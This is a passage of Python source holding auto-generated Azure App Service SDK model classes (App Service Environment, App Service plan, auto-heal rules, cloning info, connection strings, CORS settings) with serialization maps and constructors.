    :vartype id: str
    :ivar name: Resource Name.
    :vartype name: str
    :param kind: Kind of resource.
    :type kind: str
    :param location: Required. Resource Location.
    :type location: str
    :ivar type: Resource type.
    :vartype type: str
    :param tags: A set of tags. Resource tags.
    :type tags: dict[str, str]
    :param name_properties_name: Name of the App Service Environment.
    :type name_properties_name: str
    :param location_properties_location: Location of the App Service Environment, e.g. "West US".
    :type location_properties_location: str
    :ivar provisioning_state: Provisioning state of the App Service Environment. Possible values
     include: "Succeeded", "Failed", "Canceled", "InProgress", "Deleting".
    :vartype provisioning_state: str or ~azure.mgmt.web.v2016_09_01.models.ProvisioningState
    :ivar status: Current status of the App Service Environment. Possible values include:
     "Preparing", "Ready", "Scaling", "Deleting".
    :vartype status: str or ~azure.mgmt.web.v2016_09_01.models.HostingEnvironmentStatus
    :param vnet_name: Name of the Virtual Network for the App Service Environment.
    :type vnet_name: str
    :param vnet_resource_group_name: Resource group of the Virtual Network.
    :type vnet_resource_group_name: str
    :param vnet_subnet_name: Subnet of the Virtual Network.
    :type vnet_subnet_name: str
    :param virtual_network: Description of the Virtual Network.
    :type virtual_network: ~azure.mgmt.web.v2016_09_01.models.VirtualNetworkProfile
    :param internal_load_balancing_mode: Specifies which endpoints to serve internally in the
     Virtual Network for the App Service Environment. Possible values include: "None", "Web",
     "Publishing".
    :type internal_load_balancing_mode: str or
     ~azure.mgmt.web.v2016_09_01.models.InternalLoadBalancingMode
    :param multi_size: Front-end VM size, e.g. "Medium", "Large".
    :type multi_size: str
    :param multi_role_count: Number of front-end instances.
    :type multi_role_count: int
    :param worker_pools: Description of worker pools with worker size IDs, VM sizes, and number of
     workers in each pool.
    :type worker_pools: list[~azure.mgmt.web.v2016_09_01.models.WorkerPool]
    :param ipssl_address_count: Number of IP SSL addresses reserved for the App Service
     Environment.
    :type ipssl_address_count: int
    :ivar database_edition: Edition of the metadata database for the App Service Environment, e.g.
     "Standard".
    :vartype database_edition: str
    :ivar database_service_objective: Service objective of the metadata database for the App
     Service Environment, e.g. "S0".
    :vartype database_service_objective: str
    :ivar upgrade_domains: Number of upgrade domains of the App Service Environment.
    :vartype upgrade_domains: int
    :ivar subscription_id: Subscription of the App Service Environment.
    :vartype subscription_id: str
    :param dns_suffix: DNS suffix of the App Service Environment.
    :type dns_suffix: str
    :ivar last_action: Last deployment action on the App Service Environment.
    :vartype last_action: str
    :ivar last_action_result: Result of the last deployment action on the App Service Environment.
    :vartype last_action_result: str
    :ivar allowed_multi_sizes: List of comma separated strings describing which VM sizes are
     allowed for front-ends.
    :vartype allowed_multi_sizes: str
    :ivar allowed_worker_sizes: List of comma separated strings describing which VM sizes are
     allowed for workers.
    :vartype allowed_worker_sizes: str
    :ivar maximum_number_of_machines: Maximum number of VMs in the App Service Environment.
    :vartype maximum_number_of_machines: int
    :ivar vip_mappings: Description of IP SSL mapping for the App Service Environment.
    :vartype vip_mappings: list[~azure.mgmt.web.v2016_09_01.models.VirtualIPMapping]
    :ivar environment_capacities: Current total, used, and available worker capacities.
    :vartype environment_capacities: list[~azure.mgmt.web.v2016_09_01.models.StampCapacity]
    :param network_access_control_list: Access control list for controlling traffic to the App
     Service Environment.
    :type network_access_control_list:
     list[~azure.mgmt.web.v2016_09_01.models.NetworkAccessControlEntry]
    :ivar environment_is_healthy: True/false indicating whether the App Service Environment is
     healthy.
    :vartype environment_is_healthy: bool
    :ivar environment_status: Detailed message about with results of the last check of the App
     Service Environment.
    :vartype environment_status: str
    :ivar resource_group: Resource group of the App Service Environment.
    :vartype resource_group: str
    :param front_end_scale_factor: Scale factor for front-ends.
    :type front_end_scale_factor: int
    :ivar default_front_end_scale_factor: Default Scale Factor for FrontEnds.
    :vartype default_front_end_scale_factor: int
    :param api_management_account_id: API Management Account associated with the App Service
     Environment.
    :type api_management_account_id: str
    :param suspended: :code:`<code>true</code>` if the App Service Environment is suspended;
     otherwise, :code:`<code>false</code>`. The environment can be suspended, e.g. when the
     management endpoint is no longer available
     (most likely because NSG blocked the incoming traffic).
    :type suspended: bool
    :param dynamic_cache_enabled: True/false indicating whether the App Service Environment is
     suspended. The environment can be suspended e.g. when the management endpoint is no longer
     available
     (most likely because NSG blocked the incoming traffic).
    :type dynamic_cache_enabled: bool
    :param cluster_settings: Custom settings for changing the behavior of the App Service
     Environment.
    :type cluster_settings: list[~azure.mgmt.web.v2016_09_01.models.NameValuePair]
    :param user_whitelisted_ip_ranges: User added ip ranges to whitelist on ASE db.
    :type user_whitelisted_ip_ranges: list[str]
    """
    # Serialization metadata: fields flagged 'readonly' are populated by the
    # server and must not be sent in requests.
    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'location': {'required': True},
        'type': {'readonly': True},
        'provisioning_state': {'readonly': True},
        'status': {'readonly': True},
        'database_edition': {'readonly': True},
        'database_service_objective': {'readonly': True},
        'upgrade_domains': {'readonly': True},
        'subscription_id': {'readonly': True},
        'last_action': {'readonly': True},
        'last_action_result': {'readonly': True},
        'allowed_multi_sizes': {'readonly': True},
        'allowed_worker_sizes': {'readonly': True},
        'maximum_number_of_machines': {'readonly': True},
        'vip_mappings': {'readonly': True},
        'environment_capacities': {'readonly': True},
        'environment_is_healthy': {'readonly': True},
        'environment_status': {'readonly': True},
        'resource_group': {'readonly': True},
        'default_front_end_scale_factor': {'readonly': True},
    }
    # Attribute name -> REST payload key / msrest type code; 'properties.*'
    # keys nest under the ARM resource's properties envelope.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'kind': {'key': 'kind', 'type': 'str'},
        'location': {'key': 'location', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'tags': {'key': 'tags', 'type': '{str}'},
        'name_properties_name': {'key': 'properties.name', 'type': 'str'},
        'location_properties_location': {'key': 'properties.location', 'type': 'str'},
        'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
        'status': {'key': 'properties.status', 'type': 'str'},
        'vnet_name': {'key': 'properties.vnetName', 'type': 'str'},
        'vnet_resource_group_name': {'key': 'properties.vnetResourceGroupName', 'type': 'str'},
        'vnet_subnet_name': {'key': 'properties.vnetSubnetName', 'type': 'str'},
        'virtual_network': {'key': 'properties.virtualNetwork', 'type': 'VirtualNetworkProfile'},
        'internal_load_balancing_mode': {'key': 'properties.internalLoadBalancingMode', 'type': 'str'},
        'multi_size': {'key': 'properties.multiSize', 'type': 'str'},
        'multi_role_count': {'key': 'properties.multiRoleCount', 'type': 'int'},
        'worker_pools': {'key': 'properties.workerPools', 'type': '[WorkerPool]'},
        'ipssl_address_count': {'key': 'properties.ipsslAddressCount', 'type': 'int'},
        'database_edition': {'key': 'properties.databaseEdition', 'type': 'str'},
        'database_service_objective': {'key': 'properties.databaseServiceObjective', 'type': 'str'},
        'upgrade_domains': {'key': 'properties.upgradeDomains', 'type': 'int'},
        'subscription_id': {'key': 'properties.subscriptionId', 'type': 'str'},
        'dns_suffix': {'key': 'properties.dnsSuffix', 'type': 'str'},
        'last_action': {'key': 'properties.lastAction', 'type': 'str'},
        'last_action_result': {'key': 'properties.lastActionResult', 'type': 'str'},
        'allowed_multi_sizes': {'key': 'properties.allowedMultiSizes', 'type': 'str'},
        'allowed_worker_sizes': {'key': 'properties.allowedWorkerSizes', 'type': 'str'},
        'maximum_number_of_machines': {'key': 'properties.maximumNumberOfMachines', 'type': 'int'},
        'vip_mappings': {'key': 'properties.vipMappings', 'type': '[VirtualIPMapping]'},
        'environment_capacities': {'key': 'properties.environmentCapacities', 'type': '[StampCapacity]'},
        'network_access_control_list': {'key': 'properties.networkAccessControlList', 'type': '[NetworkAccessControlEntry]'},
        'environment_is_healthy': {'key': 'properties.environmentIsHealthy', 'type': 'bool'},
        'environment_status': {'key': 'properties.environmentStatus', 'type': 'str'},
        'resource_group': {'key': 'properties.resourceGroup', 'type': 'str'},
        'front_end_scale_factor': {'key': 'properties.frontEndScaleFactor', 'type': 'int'},
        'default_front_end_scale_factor': {'key': 'properties.defaultFrontEndScaleFactor', 'type': 'int'},
        'api_management_account_id': {'key': 'properties.apiManagementAccountId', 'type': 'str'},
        'suspended': {'key': 'properties.suspended', 'type': 'bool'},
        'dynamic_cache_enabled': {'key': 'properties.dynamicCacheEnabled', 'type': 'bool'},
        'cluster_settings': {'key': 'properties.clusterSettings', 'type': '[NameValuePair]'},
        'user_whitelisted_ip_ranges': {'key': 'properties.userWhitelistedIpRanges', 'type': '[str]'},
    }
    def __init__(
        self,
        **kwargs
    ):
        # Optional inputs are read from kwargs (absent -> None); attributes
        # assigned a literal None are the read-only fields listed in
        # _validation and are filled in by the service.
        super(AppServiceEnvironmentResource, self).__init__(**kwargs)
        self.name_properties_name = kwargs.get('name_properties_name', None)
        self.location_properties_location = kwargs.get('location_properties_location', None)
        self.provisioning_state = None
        self.status = None
        self.vnet_name = kwargs.get('vnet_name', None)
        self.vnet_resource_group_name = kwargs.get('vnet_resource_group_name', None)
        self.vnet_subnet_name = kwargs.get('vnet_subnet_name', None)
        self.virtual_network = kwargs.get('virtual_network', None)
        self.internal_load_balancing_mode = kwargs.get('internal_load_balancing_mode', None)
        self.multi_size = kwargs.get('multi_size', None)
        self.multi_role_count = kwargs.get('multi_role_count', None)
        self.worker_pools = kwargs.get('worker_pools', None)
        self.ipssl_address_count = kwargs.get('ipssl_address_count', None)
        self.database_edition = None
        self.database_service_objective = None
        self.upgrade_domains = None
        self.subscription_id = None
        self.dns_suffix = kwargs.get('dns_suffix', None)
        self.last_action = None
        self.last_action_result = None
        self.allowed_multi_sizes = None
        self.allowed_worker_sizes = None
        self.maximum_number_of_machines = None
        self.vip_mappings = None
        self.environment_capacities = None
        self.network_access_control_list = kwargs.get('network_access_control_list', None)
        self.environment_is_healthy = None
        self.environment_status = None
        self.resource_group = None
        self.front_end_scale_factor = kwargs.get('front_end_scale_factor', None)
        self.default_front_end_scale_factor = None
        self.api_management_account_id = kwargs.get('api_management_account_id', None)
        self.suspended = kwargs.get('suspended', None)
        self.dynamic_cache_enabled = kwargs.get('dynamic_cache_enabled', None)
        self.cluster_settings = kwargs.get('cluster_settings', None)
        self.user_whitelisted_ip_ranges = kwargs.get('user_whitelisted_ip_ranges', None)
class AppServicePlan(Resource):
    """App Service plan.
    Variables are only populated by the server, and will be ignored when sending a request.
    All required parameters must be populated in order to send to Azure.
    :ivar id: Resource Id.
    :vartype id: str
    :ivar name: Resource Name.
    :vartype name: str
    :param kind: Kind of resource.
    :type kind: str
    :param location: Required. Resource Location.
    :type location: str
    :ivar type: Resource type.
    :vartype type: str
    :param tags: A set of tags. Resource tags.
    :type tags: dict[str, str]
    :param sku: Description of a SKU for a scalable resource.
    :type sku: ~azure.mgmt.web.v2016_09_01.models.SkuDescription
    :param name_properties_name: Name for the App Service plan.
    :type name_properties_name: str
    :param worker_tier_name: Target worker tier assigned to the App Service plan.
    :type worker_tier_name: str
    :ivar status: App Service plan status. Possible values include: "Ready", "Pending", "Creating".
    :vartype status: str or ~azure.mgmt.web.v2016_09_01.models.StatusOptions
    :ivar subscription: App Service plan subscription.
    :vartype subscription: str
    :param admin_site_name: App Service plan administration site.
    :type admin_site_name: str
    :param hosting_environment_profile: Specification for the App Service Environment to use for
     the App Service plan.
    :type hosting_environment_profile: ~azure.mgmt.web.v2016_09_01.models.HostingEnvironmentProfile
    :ivar maximum_number_of_workers: Maximum number of instances that can be assigned to this App
     Service plan.
    :vartype maximum_number_of_workers: int
    :ivar geo_region: Geographical location for the App Service plan.
    :vartype geo_region: str
    :param per_site_scaling: If :code:`<code>true</code>`, apps assigned to this App Service plan
     can be scaled independently.
     If :code:`<code>false</code>`, apps assigned to this App Service plan will scale to all
     instances of the plan.
    :type per_site_scaling: bool
    :ivar number_of_sites: Number of apps assigned to this App Service plan.
    :vartype number_of_sites: int
    :param is_spot: If :code:`<code>true</code>`, this App Service Plan owns spot instances.
    :type is_spot: bool
    :param spot_expiration_time: The time when the server farm expires. Valid only if it is a spot
     server farm.
    :type spot_expiration_time: ~datetime.datetime
    :ivar resource_group: Resource group of the App Service plan.
    :vartype resource_group: str
    :param reserved: If Linux app service plan :code:`<code>true</code>`,
     :code:`<code>false</code>` otherwise.
    :type reserved: bool
    :param target_worker_count: Scaling worker count.
    :type target_worker_count: int
    :param target_worker_size_id: Scaling worker size ID.
    :type target_worker_size_id: int
    :ivar provisioning_state: Provisioning state of the App Service Environment. Possible values
     include: "Succeeded", "Failed", "Canceled", "InProgress", "Deleting".
    :vartype provisioning_state: str or ~azure.mgmt.web.v2016_09_01.models.ProvisioningState
    """
    # Serialization metadata: fields flagged 'readonly' are populated by the
    # server and must not be sent in requests.
    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'location': {'required': True},
        'type': {'readonly': True},
        'status': {'readonly': True},
        'subscription': {'readonly': True},
        'maximum_number_of_workers': {'readonly': True},
        'geo_region': {'readonly': True},
        'number_of_sites': {'readonly': True},
        'resource_group': {'readonly': True},
        'provisioning_state': {'readonly': True},
    }
    # Attribute name -> REST payload key / msrest type code; 'properties.*'
    # keys nest under the ARM resource's properties envelope.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'kind': {'key': 'kind', 'type': 'str'},
        'location': {'key': 'location', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'tags': {'key': 'tags', 'type': '{str}'},
        'sku': {'key': 'sku', 'type': 'SkuDescription'},
        'name_properties_name': {'key': 'properties.name', 'type': 'str'},
        'worker_tier_name': {'key': 'properties.workerTierName', 'type': 'str'},
        'status': {'key': 'properties.status', 'type': 'str'},
        'subscription': {'key': 'properties.subscription', 'type': 'str'},
        'admin_site_name': {'key': 'properties.adminSiteName', 'type': 'str'},
        'hosting_environment_profile': {'key': 'properties.hostingEnvironmentProfile', 'type': 'HostingEnvironmentProfile'},
        'maximum_number_of_workers': {'key': 'properties.maximumNumberOfWorkers', 'type': 'int'},
        'geo_region': {'key': 'properties.geoRegion', 'type': 'str'},
        'per_site_scaling': {'key': 'properties.perSiteScaling', 'type': 'bool'},
        'number_of_sites': {'key': 'properties.numberOfSites', 'type': 'int'},
        'is_spot': {'key': 'properties.isSpot', 'type': 'bool'},
        'spot_expiration_time': {'key': 'properties.spotExpirationTime', 'type': 'iso-8601'},
        'resource_group': {'key': 'properties.resourceGroup', 'type': 'str'},
        'reserved': {'key': 'properties.reserved', 'type': 'bool'},
        'target_worker_count': {'key': 'properties.targetWorkerCount', 'type': 'int'},
        'target_worker_size_id': {'key': 'properties.targetWorkerSizeId', 'type': 'int'},
        'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
    }
    def __init__(
        self,
        **kwargs
    ):
        # Optional inputs come from kwargs; read-only fields (see _validation)
        # start as None and are filled by the service. Note that
        # 'per_site_scaling' and 'reserved' default to False, not None.
        super(AppServicePlan, self).__init__(**kwargs)
        self.sku = kwargs.get('sku', None)
        self.name_properties_name = kwargs.get('name_properties_name', None)
        self.worker_tier_name = kwargs.get('worker_tier_name', None)
        self.status = None
        self.subscription = None
        self.admin_site_name = kwargs.get('admin_site_name', None)
        self.hosting_environment_profile = kwargs.get('hosting_environment_profile', None)
        self.maximum_number_of_workers = None
        self.geo_region = None
        self.per_site_scaling = kwargs.get('per_site_scaling', False)
        self.number_of_sites = None
        self.is_spot = kwargs.get('is_spot', None)
        self.spot_expiration_time = kwargs.get('spot_expiration_time', None)
        self.resource_group = None
        self.reserved = kwargs.get('reserved', False)
        self.target_worker_count = kwargs.get('target_worker_count', None)
        self.target_worker_size_id = kwargs.get('target_worker_size_id', None)
        self.provisioning_state = None
class AppServicePlanCollection(msrest.serialization.Model):
    """A page of App Service plans together with a link to the next page.

    All required parameters must be populated in order to send to Azure.

    :param value: Required. Collection of resources.
    :type value: list[~azure.mgmt.web.v2016_09_01.models.AppServicePlan]
    :param next_link: Link to next page of resources.
    :type next_link: str
    """

    _validation = {
        'value': {'required': True},
    }

    _attribute_map = {
        'value': {'key': 'value', 'type': '[AppServicePlan]'},
        'next_link': {'key': 'nextLink', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(AppServicePlanCollection, self).__init__(**kwargs)
        # 'value' is mandatory: a missing key raises KeyError.
        self.value = kwargs['value']
        # No 'next_link' means this is the last page.
        self.next_link = kwargs.get('next_link')
class AppServicePlanPatchResource(ProxyOnlyResource):
    """ARM resource for a app service plan.
    Variables are only populated by the server, and will be ignored when sending a request.
    :ivar id: Resource Id.
    :vartype id: str
    :ivar name: Resource Name.
    :vartype name: str
    :param kind: Kind of resource.
    :type kind: str
    :ivar type: Resource type.
    :vartype type: str
    :param name_properties_name: Name for the App Service plan.
    :type name_properties_name: str
    :param worker_tier_name: Target worker tier assigned to the App Service plan.
    :type worker_tier_name: str
    :ivar status: App Service plan status. Possible values include: "Ready", "Pending", "Creating".
    :vartype status: str or ~azure.mgmt.web.v2016_09_01.models.StatusOptions
    :ivar subscription: App Service plan subscription.
    :vartype subscription: str
    :param admin_site_name: App Service plan administration site.
    :type admin_site_name: str
    :param hosting_environment_profile: Specification for the App Service Environment to use for
     the App Service plan.
    :type hosting_environment_profile: ~azure.mgmt.web.v2016_09_01.models.HostingEnvironmentProfile
    :ivar maximum_number_of_workers: Maximum number of instances that can be assigned to this App
     Service plan.
    :vartype maximum_number_of_workers: int
    :ivar geo_region: Geographical location for the App Service plan.
    :vartype geo_region: str
    :param per_site_scaling: If :code:`<code>true</code>`, apps assigned to this App Service plan
     can be scaled independently.
     If :code:`<code>false</code>`, apps assigned to this App Service plan will scale to all
     instances of the plan.
    :type per_site_scaling: bool
    :ivar number_of_sites: Number of apps assigned to this App Service plan.
    :vartype number_of_sites: int
    :param is_spot: If :code:`<code>true</code>`, this App Service Plan owns spot instances.
    :type is_spot: bool
    :param spot_expiration_time: The time when the server farm expires. Valid only if it is a spot
     server farm.
    :type spot_expiration_time: ~datetime.datetime
    :ivar resource_group: Resource group of the App Service plan.
    :vartype resource_group: str
    :param reserved: If Linux app service plan :code:`<code>true</code>`,
     :code:`<code>false</code>` otherwise.
    :type reserved: bool
    :param target_worker_count: Scaling worker count.
    :type target_worker_count: int
    :param target_worker_size_id: Scaling worker size ID.
    :type target_worker_size_id: int
    :ivar provisioning_state: Provisioning state of the App Service Environment. Possible values
     include: "Succeeded", "Failed", "Canceled", "InProgress", "Deleting".
    :vartype provisioning_state: str or ~azure.mgmt.web.v2016_09_01.models.ProvisioningState
    """
    # Serialization metadata: fields flagged 'readonly' are populated by the
    # server and must not be sent in requests. Unlike AppServicePlan, this
    # PATCH shape has no 'location' requirement (proxy-only resource).
    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
        'status': {'readonly': True},
        'subscription': {'readonly': True},
        'maximum_number_of_workers': {'readonly': True},
        'geo_region': {'readonly': True},
        'number_of_sites': {'readonly': True},
        'resource_group': {'readonly': True},
        'provisioning_state': {'readonly': True},
    }
    # Attribute name -> REST payload key / msrest type code; 'properties.*'
    # keys nest under the ARM resource's properties envelope.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'kind': {'key': 'kind', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'name_properties_name': {'key': 'properties.name', 'type': 'str'},
        'worker_tier_name': {'key': 'properties.workerTierName', 'type': 'str'},
        'status': {'key': 'properties.status', 'type': 'str'},
        'subscription': {'key': 'properties.subscription', 'type': 'str'},
        'admin_site_name': {'key': 'properties.adminSiteName', 'type': 'str'},
        'hosting_environment_profile': {'key': 'properties.hostingEnvironmentProfile', 'type': 'HostingEnvironmentProfile'},
        'maximum_number_of_workers': {'key': 'properties.maximumNumberOfWorkers', 'type': 'int'},
        'geo_region': {'key': 'properties.geoRegion', 'type': 'str'},
        'per_site_scaling': {'key': 'properties.perSiteScaling', 'type': 'bool'},
        'number_of_sites': {'key': 'properties.numberOfSites', 'type': 'int'},
        'is_spot': {'key': 'properties.isSpot', 'type': 'bool'},
        'spot_expiration_time': {'key': 'properties.spotExpirationTime', 'type': 'iso-8601'},
        'resource_group': {'key': 'properties.resourceGroup', 'type': 'str'},
        'reserved': {'key': 'properties.reserved', 'type': 'bool'},
        'target_worker_count': {'key': 'properties.targetWorkerCount', 'type': 'int'},
        'target_worker_size_id': {'key': 'properties.targetWorkerSizeId', 'type': 'int'},
        'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
    }
    def __init__(
        self,
        **kwargs
    ):
        # Optional inputs come from kwargs; read-only fields (see _validation)
        # start as None and are filled by the service. Note that
        # 'per_site_scaling' and 'reserved' default to False, not None.
        super(AppServicePlanPatchResource, self).__init__(**kwargs)
        self.name_properties_name = kwargs.get('name_properties_name', None)
        self.worker_tier_name = kwargs.get('worker_tier_name', None)
        self.status = None
        self.subscription = None
        self.admin_site_name = kwargs.get('admin_site_name', None)
        self.hosting_environment_profile = kwargs.get('hosting_environment_profile', None)
        self.maximum_number_of_workers = None
        self.geo_region = None
        self.per_site_scaling = kwargs.get('per_site_scaling', False)
        self.number_of_sites = None
        self.is_spot = kwargs.get('is_spot', None)
        self.spot_expiration_time = kwargs.get('spot_expiration_time', None)
        self.resource_group = None
        self.reserved = kwargs.get('reserved', False)
        self.target_worker_count = kwargs.get('target_worker_count', None)
        self.target_worker_size_id = kwargs.get('target_worker_size_id', None)
        self.provisioning_state = None
class AutoHealActions(msrest.serialization.Model):
    """Action the auto-heal module performs once one of its rules is triggered.

    :param action_type: Predefined action to be taken. Possible values include: "Recycle",
     "LogEvent", "CustomAction".
    :type action_type: str or ~azure.mgmt.web.v2016_09_01.models.AutoHealActionType
    :param custom_action: Custom action to be taken.
    :type custom_action: ~azure.mgmt.web.v2016_09_01.models.AutoHealCustomAction
    :param min_process_execution_time: Minimum time the process must execute before taking the
     action.
    :type min_process_execution_time: str
    """

    _attribute_map = {
        'action_type': {'key': 'actionType', 'type': 'str'},
        'custom_action': {'key': 'customAction', 'type': 'AutoHealCustomAction'},
        'min_process_execution_time': {'key': 'minProcessExecutionTime', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(AutoHealActions, self).__init__(**kwargs)
        # All settings are optional; unspecified ones stay None.
        self.min_process_execution_time = kwargs.get('min_process_execution_time')
        self.custom_action = kwargs.get('custom_action')
        self.action_type = kwargs.get('action_type')
class AutoHealCustomAction(msrest.serialization.Model):
    """A custom executable to run when an auto-heal rule fires.

    :param exe: Executable to be run.
    :type exe: str
    :param parameters: Parameters for the executable.
    :type parameters: str
    """

    _attribute_map = {
        'exe': {'key': 'exe', 'type': 'str'},
        'parameters': {'key': 'parameters', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(AutoHealCustomAction, self).__init__(**kwargs)
        # Both fields are optional; absent keys default to None.
        self.parameters = kwargs.get('parameters')
        self.exe = kwargs.get('exe')
class AutoHealRules(msrest.serialization.Model):
    """Pairing of auto-heal trigger conditions with the actions they execute.

    :param triggers: Conditions that describe when to execute the auto-heal actions.
    :type triggers: ~azure.mgmt.web.v2016_09_01.models.AutoHealTriggers
    :param actions: Actions to be executed when a rule is triggered.
    :type actions: ~azure.mgmt.web.v2016_09_01.models.AutoHealActions
    """

    _attribute_map = {
        'triggers': {'key': 'triggers', 'type': 'AutoHealTriggers'},
        'actions': {'key': 'actions', 'type': 'AutoHealActions'},
    }

    def __init__(self, **kwargs):
        super(AutoHealRules, self).__init__(**kwargs)
        # Both parts are optional; absent keys default to None.
        self.actions = kwargs.get('actions')
        self.triggers = kwargs.get('triggers')
class AutoHealTriggers(msrest.serialization.Model):
    """The set of conditions that can trigger auto-heal.

    :param requests: A rule based on total requests.
    :type requests: ~azure.mgmt.web.v2016_09_01.models.RequestsBasedTrigger
    :param private_bytes_in_kb: A rule based on private bytes.
    :type private_bytes_in_kb: int
    :param status_codes: A rule based on status codes.
    :type status_codes: list[~azure.mgmt.web.v2016_09_01.models.StatusCodesBasedTrigger]
    :param slow_requests: A rule based on request execution time.
    :type slow_requests: ~azure.mgmt.web.v2016_09_01.models.SlowRequestsBasedTrigger
    """

    _attribute_map = {
        'requests': {'key': 'requests', 'type': 'RequestsBasedTrigger'},
        'private_bytes_in_kb': {'key': 'privateBytesInKB', 'type': 'int'},
        'status_codes': {'key': 'statusCodes', 'type': '[StatusCodesBasedTrigger]'},
        'slow_requests': {'key': 'slowRequests', 'type': 'SlowRequestsBasedTrigger'},
    }

    def __init__(self, **kwargs):
        super(AutoHealTriggers, self).__init__(**kwargs)
        # Every trigger is optional; unspecified ones stay None.
        for _field in ('requests', 'private_bytes_in_kb', 'status_codes', 'slow_requests'):
            setattr(self, _field, kwargs.get(_field))
class Capability(msrest.serialization.Model):
    """A single capability/feature allowed for a specific SKU.

    :param name: Name of the SKU capability.
    :type name: str
    :param value: Value of the SKU capability.
    :type value: str
    :param reason: Reason of the SKU capability.
    :type reason: str
    """

    _attribute_map = {
        'name': {'key': 'name', 'type': 'str'},
        'value': {'key': 'value', 'type': 'str'},
        'reason': {'key': 'reason', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(Capability, self).__init__(**kwargs)
        # All fields are optional; unspecified ones stay None.
        for _field in ('name', 'value', 'reason'):
            setattr(self, _field, kwargs.get(_field))
class CloningInfo(msrest.serialization.Model):
    """Information needed for cloning operation.

    All required parameters must be populated in order to send to Azure.

    :param correlation_id: Correlation ID of cloning operation. This ID ties multiple cloning
     operations
     together to use the same snapshot.
    :type correlation_id: str
    :param overwrite: :code:`<code>true</code>` to overwrite destination app; otherwise,
     :code:`<code>false</code>`.
    :type overwrite: bool
    :param clone_custom_host_names: :code:`<code>true</code>` to clone custom hostnames from source
     app; otherwise, :code:`<code>false</code>`.
    :type clone_custom_host_names: bool
    :param clone_source_control: :code:`<code>true</code>` to clone source control from source app;
     otherwise, :code:`<code>false</code>`.
    :type clone_source_control: bool
    :param source_web_app_id: Required. ARM resource ID of the source app. App resource ID is of
     the form
     /subscriptions/{subId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/sites/{siteName}
     for production slots and
     /subscriptions/{subId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/sites/{siteName}/slots/{slotName}
     for other slots.
    :type source_web_app_id: str
    :param hosting_environment: App Service Environment.
    :type hosting_environment: str
    :param app_settings_overrides: Application setting overrides for cloned app. If specified,
     these settings override the settings cloned
     from source app. Otherwise, application settings from source app are retained.
    :type app_settings_overrides: dict[str, str]
    :param configure_load_balancing: :code:`<code>true</code>` to configure load balancing for
     source and destination app.
    :type configure_load_balancing: bool
    :param traffic_manager_profile_id: ARM resource ID of the Traffic Manager profile to use, if it
     exists. Traffic Manager resource ID is of the form
     /subscriptions/{subId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/trafficManagerProfiles/{profileName}.
    :type traffic_manager_profile_id: str
    :param traffic_manager_profile_name: Name of Traffic Manager profile to create. This is only
     needed if Traffic Manager profile does not already exist.
    :type traffic_manager_profile_name: str
    :param ignore_quotas: :code:`<code>true</code>` if quotas should be ignored; otherwise,
     :code:`<code>false</code>`.
    :type ignore_quotas: bool
    """

    _validation = {
        'source_web_app_id': {'required': True},
    }

    _attribute_map = {
        'correlation_id': {'key': 'correlationId', 'type': 'str'},
        'overwrite': {'key': 'overwrite', 'type': 'bool'},
        'clone_custom_host_names': {'key': 'cloneCustomHostNames', 'type': 'bool'},
        'clone_source_control': {'key': 'cloneSourceControl', 'type': 'bool'},
        'source_web_app_id': {'key': 'sourceWebAppId', 'type': 'str'},
        'hosting_environment': {'key': 'hostingEnvironment', 'type': 'str'},
        'app_settings_overrides': {'key': 'appSettingsOverrides', 'type': '{str}'},
        'configure_load_balancing': {'key': 'configureLoadBalancing', 'type': 'bool'},
        'traffic_manager_profile_id': {'key': 'trafficManagerProfileId', 'type': 'str'},
        'traffic_manager_profile_name': {'key': 'trafficManagerProfileName', 'type': 'str'},
        'ignore_quotas': {'key': 'ignoreQuotas', 'type': 'bool'},
    }

    def __init__(self, **kwargs):
        super(CloningInfo, self).__init__(**kwargs)
        # Optional settings; absent keys default to None.
        for _field in (
            'correlation_id',
            'overwrite',
            'clone_custom_host_names',
            'clone_source_control',
            'hosting_environment',
            'app_settings_overrides',
            'configure_load_balancing',
            'traffic_manager_profile_id',
            'traffic_manager_profile_name',
            'ignore_quotas',
        ):
            setattr(self, _field, kwargs.get(_field))
        # Only the source app's ARM resource ID is mandatory.
        self.source_web_app_id = kwargs['source_web_app_id']
class ConnStringInfo(msrest.serialization.Model):
    """A single database connection string entry.

    :param name: Name of connection string.
    :type name: str
    :param connection_string: Connection string value.
    :type connection_string: str
    :param type: Type of database. Possible values include: "MySql", "SQLServer", "SQLAzure",
     "Custom", "NotificationHub", "ServiceBus", "EventHub", "ApiHub", "DocDb", "RedisCache",
     "PostgreSQL".
    :type type: str or ~azure.mgmt.web.v2016_09_01.models.ConnectionStringType
    """

    # Maps Python attribute names to wire keys/types for msrest serialization.
    _attribute_map = {
        'name': {'key': 'name', 'type': 'str'},
        'connection_string': {'key': 'connectionString', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(ConnStringInfo, self).__init__(**kwargs)
        # Every property is optional; unset ones become None.
        for _attr in ('name', 'connection_string', 'type'):
            setattr(self, _attr, kwargs.get(_attr))
class CorsSettings(msrest.serialization.Model):
    """Cross-Origin Resource Sharing (CORS) configuration for the app.

    :param allowed_origins: The list of origins permitted to make cross-origin
     calls (for example: http://example.com:12345). Use "*" to allow all.
    :type allowed_origins: list[str]
    """

    # Maps Python attribute names to wire keys/types for msrest serialization.
    _attribute_map = {
        'allowed_origins': {'key': 'allowedOrigins', 'type': '[str]'},
    }

